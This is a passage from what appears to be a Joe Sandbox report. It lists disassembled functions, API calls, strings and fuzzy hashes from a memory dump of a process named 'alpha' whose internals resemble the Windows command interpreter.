                                                                                                                    • Source File: 00000006.00000002.2005500659.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.2005478527.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005546829.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005633976.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: memset$FullNamePathwcsrchr
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4289998964-0
                                                                                                                    • Opcode ID: ca4f6fec6d1e45853bca55d284d940f9823b5f813051b5de8d9b268dc279a2c6
                                                                                                                    • Instruction ID: aae943abb93caee7bf7d8eb2a6b25fe7be53a474d6a214296b4737bba2217297
                                                                                                                    • Opcode Fuzzy Hash: ca4f6fec6d1e45853bca55d284d940f9823b5f813051b5de8d9b268dc279a2c6
                                                                                                                    • Instruction Fuzzy Hash: CEC19011A0935E82EA94BF91954837DBBB5FF45FA6FA05531CE0E077D0EE3CA491C220
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BC8DF8 Relevance: 7.8, APIs: 5, Instructions: 281COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.2005500659.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.2005478527.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005546829.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005633976.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: memset
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2221118986-0
                                                                                                                    • Opcode ID: 4ec132db5a5163512eeab285e6cca4fd0bb6ff7b6cd64baaaa3bea2245e3dd05
                                                                                                                    • Instruction ID: d4bb1f73b970612e71358c105fbf0c62a92b2d2e6c9fa73d68f0c92f9d912026
                                                                                                                    • Opcode Fuzzy Hash: 4ec132db5a5163512eeab285e6cca4fd0bb6ff7b6cd64baaaa3bea2245e3dd05
                                                                                                                    • Instruction Fuzzy Hash: 1EC10722A0978A86EB60EF21E854AF9ABB0FF95F59FA44535DA0D47790DF3CD140C320
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BCD250 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 187COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.2005500659.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.2005478527.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005546829.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005633976.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcsicmp
                                                                                                                    • String ID: GeToken: (%x) '%s'
                                                                                                                    • API String ID: 2081463915-1994581435
                                                                                                                    • Opcode ID: fe18cb0ed8500a4f68af4489c4d2b16fbbaa9a87b1c7dbde9da4f66a5e2be525
                                                                                                                    • Instruction ID: 70fd25d74da47d12fb716eef386bc8dc117f4746264db55345f3ca8141e561f9
                                                                                                                    • Opcode Fuzzy Hash: fe18cb0ed8500a4f68af4489c4d2b16fbbaa9a87b1c7dbde9da4f66a5e2be525
                                                                                                                    • Instruction Fuzzy Hash: F1719E24E0C68BC6FBA4BF65E444275AAB0BF40FAAFF40535D50D466A1DF3DA881C720
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BD02A0 Relevance: 35.3, APIs: 13, Strings: 7, Instructions: 279COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.2005500659.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.2005478527.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005546829.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005633976.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcsicmp$iswspacewcschr
                                                                                                                    • String ID: ;$=,;$FOR$FOR/?$IF/?$REM$REM/?
                                                                                                                    • API String ID: 840959033-3627297882
                                                                                                                    • Opcode ID: a685c2dfbfb933869e1ee9a5fd26f57dd0ea790cc444f73fb6d6a268455a5bb9
                                                                                                                    • Instruction ID: 4211118bbea2dbb3ad5e21c13c292b0b335293eedc5265c8fa3e386c4432ebdb
                                                                                                                    • Opcode Fuzzy Hash: a685c2dfbfb933869e1ee9a5fd26f57dd0ea790cc444f73fb6d6a268455a5bb9
                                                                                                                    • Instruction Fuzzy Hash: D6D15721E0C64BC6FA54BF21E8592B8AAB0BF45F46FF45035E94E472A5EE2CE405C730
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BC32B0 Relevance: 27.2, APIs: 18, Instructions: 243COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00007FF789BD3578: _get_osfhandle.MSVCRT ref: 00007FF789BD3584
                                                                                                                      • Part of subcall function 00007FF789BD3578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF789BC32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF789BD359C
                                                                                                                      • Part of subcall function 00007FF789BD3578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF789BC32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF789BD35C3
                                                                                                                      • Part of subcall function 00007FF789BD3578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF789BC32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF789BD35D9
                                                                                                                      • Part of subcall function 00007FF789BD3578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF789BC32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF789BD35ED
                                                                                                                      • Part of subcall function 00007FF789BD3578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF789BC32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF789BD3602
                                                                                                                    • _get_osfhandle.MSVCRT ref: 00007FF789BC32F3
                                                                                                                    • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000014,?,?,0000002F,00007FF789BC32A4), ref: 00007FF789BC3309
                                                                                                                    • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 00007FF789BC3384
                                                                                                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF789BE11DF
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.2005500659.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.2005478527.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005546829.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005633976.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Console$LockShared_get_osfhandle$AcquireBufferErrorFileHandleInfoLastModeReleaseScreenTypeWrite
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 611521582-0
                                                                                                                    • Opcode ID: 273daed2c2834dfc8b6dfef377a9808402fe7d58939b34531bf6f611b2348d3e
                                                                                                                    • Instruction ID: 011e5cb493d8f09fa99c0f6b33819a0f1d203141f79872e10c3efddf03b11205
                                                                                                                    • Opcode Fuzzy Hash: 273daed2c2834dfc8b6dfef377a9808402fe7d58939b34531bf6f611b2348d3e
                                                                                                                    • Instruction Fuzzy Hash: 2CA19022B0861686EB14AF61E8542BDFAB1FB89F9AFE44135CD0E47784EF3CD445C620
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BD26E0 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 187fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.2005500659.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.2005478527.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005546829.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005633976.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateFile_open_osfhandle
                                                                                                                    • String ID: con
                                                                                                                    • API String ID: 2905481843-4257191772
                                                                                                                    • Opcode ID: bb4e9a8148a0ebbab0b20462a10cedd0498cb3513ed2e56bee41ab165d728bb2
                                                                                                                    • Instruction ID: 112f27413d1f9d5081d6a331526e7c0725ed7c5c05c77d69bd2ba058dd18133c
                                                                                                                    • Opcode Fuzzy Hash: bb4e9a8148a0ebbab0b20462a10cedd0498cb3513ed2e56bee41ab165d728bb2
                                                                                                                    • Instruction Fuzzy Hash: 4871A532A086858AE760AF55E444279FEB0FB89FA2FA44234DA5E427D4DF3DD449CB10
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BF1A40 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 148COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.2005500659.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.2005478527.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005546829.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005633976.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcsicmpmemset$Volume$DriveInformationNamePathType
                                                                                                                    • String ID: CSVFS$NTFS$REFS
                                                                                                                    • API String ID: 3510147486-2605508654
                                                                                                                    • Opcode ID: 16da7e415156957614f2e65e2147701ecc6f9267ccedce46241fe4d5de2b202f
                                                                                                                    • Instruction ID: ff350af1ce8a9bb48c6a083615066fc6edcec415700679fdb3c8c517ade62cac
                                                                                                                    • Opcode Fuzzy Hash: 16da7e415156957614f2e65e2147701ecc6f9267ccedce46241fe4d5de2b202f
                                                                                                                    • Instruction Fuzzy Hash: 78617F32708BC68AEB659F21D8543E9BBB4FB45B8AF945035DA0D4B758EF38D104C710
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BC72B0 Relevance: 21.3, APIs: 1, Strings: 11, Instructions: 283COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • longjmp.MSVCRT(?,00000000,00000000,00007FF789BC7279,?,?,?,?,?,00007FF789BCBFA9), ref: 00007FF789BE4485
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.2005500659.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.2005478527.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005546829.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005633976.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: longjmp
                                                                                                                    • String ID: == $EQU $FOR$FOR /?$GEQ $GTR $IF /?$LEQ $LSS $NEQ $REM /?
                                                                                                                    • API String ID: 1832741078-366822981
                                                                                                                    • Opcode ID: 33da1405c176275929384e71d7b709e1d480dac8859b2aca32cf24daa89c1558
                                                                                                                    • Instruction ID: 16fd5e9b91d4a141e45b85494afb12685d7b82db018508fa49dd583c206364c9
                                                                                                                    • Opcode Fuzzy Hash: 33da1405c176275929384e71d7b709e1d480dac8859b2aca32cf24daa89c1558
                                                                                                                    • Instruction Fuzzy Hash: CBC17E60E0C64A85E624BF5691846BCAFB6BF46FAAFF00036DD0D57691CF2CA546C360
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BD662C Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 170COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.2005500659.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.2005478527.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005546829.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005633976.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: iswdigit$_errnoiswalphawcschrwcstol
                                                                                                                    • String ID: +-~!$APerformUnaryOperation: '%c'
                                                                                                                    • API String ID: 2348642995-441775793
                                                                                                                    • Opcode ID: 3043d5b8b3736d8e68c05dd1a897401147fff5d71c47df5c8b899d9aaf2ce369
                                                                                                                    • Instruction ID: e0ffeab5e23f611bdaec064cabd414c1e91449732b3c622d12e21bab0db80ec3
                                                                                                                    • Opcode Fuzzy Hash: 3043d5b8b3736d8e68c05dd1a897401147fff5d71c47df5c8b899d9aaf2ce369
                                                                                                                    • Instruction Fuzzy Hash: A2714C66908A4EC6E7606F25D458179FBB0FB49F86BA4D031FA4E07294EF3CA584C721
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BC86B0 Relevance: 18.1, APIs: 8, Strings: 4, Instructions: 138memoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.2005500659.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.2005478527.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005546829.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005633976.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Heap$_wcsicmp$AllocProcess
                                                                                                                    • String ID: DISABLEDELAYEDEXPANSION$DISABLEEXTENSIONS$ENABLEDELAYEDEXPANSION$ENABLEEXTENSIONS
                                                                                                                    • API String ID: 3223794493-3086019870
                                                                                                                    • Opcode ID: cb3c41489134d7bf02aea1d2124d883155d35966149708651120c5f9a30c6a47
                                                                                                                    • Instruction ID: 7a4f48906e7680afa63cd558767df5f8d03962b7ec9396b60b2650650457d675
                                                                                                                    • Opcode Fuzzy Hash: cb3c41489134d7bf02aea1d2124d883155d35966149708651120c5f9a30c6a47
                                                                                                                    • Instruction Fuzzy Hash: D1517025A0874686FA54AF25E414179BFB0FF49FA6FA85135CA1E077A0EF3DE441C720
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BE86FC Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 226timeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.2005500659.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.2005478527.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005546829.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005633976.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: LocalTime$ErrorLast_get_osfhandle
                                                                                                                    • String ID: %s$/-.$:
                                                                                                                    • API String ID: 1644023181-879152773
                                                                                                                    • Opcode ID: 52adc4b69c0d6b0cc37f226843e3bc06c06473f0745bac629c27b33a4c267472
                                                                                                                    • Instruction ID: 4764e5d2ba008fde952baebc2dfd97bddb6c85fe70738d9461bcd208d9c46411
                                                                                                                    • Opcode Fuzzy Hash: 52adc4b69c0d6b0cc37f226843e3bc06c06473f0745bac629c27b33a4c267472
                                                                                                                    • Instruction Fuzzy Hash: 0A91B062A08A4E91EF50AF60D4442BEEBB4FF84F96FE44135DA4E426D4EE3CE545C720
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BE627C Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 95synchronizationCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • WaitForSingleObject.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF789BE7251), ref: 00007FF789BE628E
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.2005500659.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.2005478527.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005546829.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005633976.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ObjectSingleWait
                                                                                                                    • String ID: wil
                                                                                                                    • API String ID: 24740636-1589926490
                                                                                                                    • Opcode ID: ea3b1f99615cb6da41309659edc9fe07f1318ac417b21432a0effa90e1671882
                                                                                                                    • Instruction ID: d8b0549a18cb4b3e97e94c7229933dc549111150a9124726dece50ec1bbe8ef1
                                                                                                                    • Opcode Fuzzy Hash: ea3b1f99615cb6da41309659edc9fe07f1318ac417b21432a0effa90e1671882
                                                                                                                    • Instruction Fuzzy Hash: 05414E21A0854AC3F3206F15E40427DAEB5FF85F92FB08131E90A87A94DF3DE844C621
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BC7AA0 Relevance: 15.2, APIs: 10, Instructions: 221COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.2005500659.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.2005478527.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005546829.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005633976.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateDirectoryDriveFullNamePathTypememset
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1397130798-0
                                                                                                                    • Opcode ID: 53223a99652f8e81a4eeb04428d23ca491e991d1bc8129b69f2a7ec7696704bc
                                                                                                                    • Instruction ID: 34664e6156a1d32c6817267a535a5569741a9a4084b48e267746aadecc976287
                                                                                                                    • Opcode Fuzzy Hash: 53223a99652f8e81a4eeb04428d23ca491e991d1bc8129b69f2a7ec7696704bc
                                                                                                                    • Instruction Fuzzy Hash: F091A422A09B8A8AEA64AF11D4542B9FBB1FF84F96FE48135D94D47794EF3CD540C320
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00007FF789BD7E80 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 210COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00007FF789BCD3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF789BCD46E
                                                                                                                      • Part of subcall function 00007FF789BCD3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF789BCD485
                                                                                                                      • Part of subcall function 00007FF789BCD3F0: wcschr.MSVCRT ref: 00007FF789BCD4EE
                                                                                                                      • Part of subcall function 00007FF789BCD3F0: iswspace.MSVCRT ref: 00007FF789BCD54D
                                                                                                                      • Part of subcall function 00007FF789BCD3F0: wcschr.MSVCRT ref: 00007FF789BCD569
                                                                                                                      • Part of subcall function 00007FF789BCD3F0: wcschr.MSVCRT ref: 00007FF789BCD58C
                                                                                                                    • iswspace.MSVCRT ref: 00007FF789BD7EEE
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.2005500659.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.2005478527.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
